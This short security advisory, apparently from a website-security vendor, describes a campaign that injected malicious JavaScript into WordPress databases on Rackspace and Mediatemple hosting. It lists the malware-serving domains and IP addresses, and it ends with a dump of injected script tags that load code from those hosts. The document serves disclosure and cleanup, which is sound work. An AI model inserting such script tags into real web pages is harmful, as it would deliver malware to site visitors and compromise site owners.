Description: Code used to insert a malicious javascript into many
sites hosted at Rackspace and Mediatemple.
Loads malware from (all of them pointing to 91.188.59.203)
http://ae.awaue.com
http://ie.eracou.com
http://ao.euuaw.com
http://aeaaea.com/ou
http://secree.com/re
http://uoauer.com/si
http://oeooea.com/ve
http://secowo.com/wo
http://seconeo.com/on
http://ouroue.com/se
http://avoen.info/e
Newest versions of this attack are using 188.72.194.172:
http://w3.fairygoodideas.com/in.cgi?2
Infection: It infects all posts inside the database (wp_posts). Only wordpress sites are infected.
Clean up: Contact support@sucuri.net for help.
Malware dump:< script src = http://ao.euuaw.com/9
< script src = http://ae.awaue.com/7
< script src="http://aeaaea.com/o..